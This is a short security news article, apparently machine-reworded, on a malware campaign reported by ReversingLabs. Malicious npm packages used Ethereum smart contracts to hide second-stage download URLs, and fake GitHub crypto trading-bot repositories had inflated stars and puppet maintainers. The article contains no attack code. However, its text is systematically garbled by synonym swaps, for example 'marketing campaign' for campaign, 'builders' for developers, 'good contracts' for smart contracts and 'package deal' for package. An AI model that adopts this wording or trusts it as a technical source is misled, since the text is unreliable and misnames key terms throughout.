A malicious marketing campaign concentrating on builders by npm and GitHub repositories has been uncovered, that includes an uncommon technique of utilizing Ethereum good contracts to hide command-and-control (C2) infrastructure.
The marketing campaign first got here to gentle in early July when ReversingLabs researcher Karlo Zanki found a package deal named “colortoolsv2” on npm.
The package deal was shortly eliminated, however attackers tried to proceed the operation by publishing a reproduction package deal, “mimelib2.” Each packages deployed a second-stage malware payload by blockchain infrastructure.
What’s New in This Marketing campaign
Whereas malicious npm downloaders seem usually, these sometimes comprise URLs or scripts embedded within the package deal itself.
In distinction, colortoolsv2 and mimelib2 leveraged Ethereum good contracts to retailer and ship the URLs used for fetching the second-stage malware. This tactic made detection considerably tougher, because the malicious infrastructure was hidden throughout the blockchain code somewhat than contained in the package deal recordsdata.
“Downloaders are […] revealed weekly, [but] this use of good contracts to load malicious instructions is one thing we haven’t seen beforehand,” RL researchers mentioned.
“It highlights the quick evolution of detection evasion methods by malicious actors who’re trolling open supply repositories and builders.”
GitHub Repositories Disguised as Buying and selling Instruments
ReversingLabs investigators additionally discovered that the npm packages had been tied to a broader marketing campaign throughout GitHub. Pretend repositories, introduced as cryptocurrency buying and selling bots, appeared well-established with hundreds of commits, a number of maintainers and lively watchers.
Nonetheless, a lot of this exercise was fabricated. In response to ReversingLabs, stars and watchers got here from accounts created in July, every with minimal exercise. Moreover, Puppet accounts acted as maintainers to inflate legitimacy, and forks and commits had been used to create the phantasm of recognition.
Probably the most distinguished instance was a repository named “solana-trading-bot-v2,” which bundled the malicious npm package deal. Though it seemed to be a severe challenge, nearer inspection revealed the community of faux accounts supporting it.
Rising Threats to Open Supply
The invention provides to a rising record of software program provide chain assaults concentrating on crypto-focused builders.
In response to ReversingLabs’s 2025 Software program Provide Chain Safety report, there have been 23 such campaigns in 2024, together with a compromise of the PyPI package ultralytics in December that delivered a coin miner.
These incidents spotlight the evolving ways of attackers exploiting each open-source repositories and blockchain know-how. ReversingLabs researchers warned that builders should rigorously vet libraries and maintainers, wanting past floor metrics similar to stars or downloads.
The report concluded that vigilance and stronger package deal evaluation instruments are important to defending digital property and growth environments.
